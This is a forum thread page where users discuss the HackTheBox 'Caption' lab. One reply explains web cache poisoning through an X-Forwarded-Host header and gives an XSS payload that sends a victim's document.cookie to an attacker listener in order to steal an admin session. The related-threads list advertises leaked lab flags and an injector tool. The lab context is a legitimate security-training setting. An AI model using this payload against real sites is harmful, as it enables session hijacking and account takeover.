Jan 12, 2025, 02:57 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
Jan 24, 2025, 10:20 PM
(Jan 12, 2025, 02:57 AM)BlackBeer Wrote:(Nov 29, 2024, 05:34 PM)cutearmadillo Wrote: You use cache poisoning to insert malicious javascript into the page I'm not sure if i can atm, cause im at work and using a VM. but I sent the request when i first traversed to the /Firewalls page to repeater in burp and set up a listener: python3 -m http.server {listenerport} then sent ``` X-Forwarded-Host: 127.0.0.1"> </script> <script src="http://LOCALIP:LPORT/exploit.js"></script> <!-- ``` with the script containing ``` X-Forwarded-Host: 127.0.0.1"> </script> <script>new Image().src="http://LOCALIP:LPORT/?c="+encodeURI(document.cookie);</script><!-- ``` Then waited for my listener to catch the admin's cookie via the .js script that had been placed in the webcache Hope this helps, ping me later if it doesnt and i'll see if i can do any more |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 386 | 96,300 |
1 hour ago Last Post: Sulk4685 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 49 | 3,910 |
5 hours ago Last Post: opium0221 |
||
| [FREE] CPTS 12 FLAGS | 87 | 3,359 |
10 hours ago Last Post: darth_sidious |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 98 | 9,211 |
May 07, 2026, 08:05 PM Last Post: Zacker90 |
||
| SVCHOST Injector 2026 | 0 | 115 |
May 07, 2026, 01:41 PM Last Post: opsecmaster67 |
||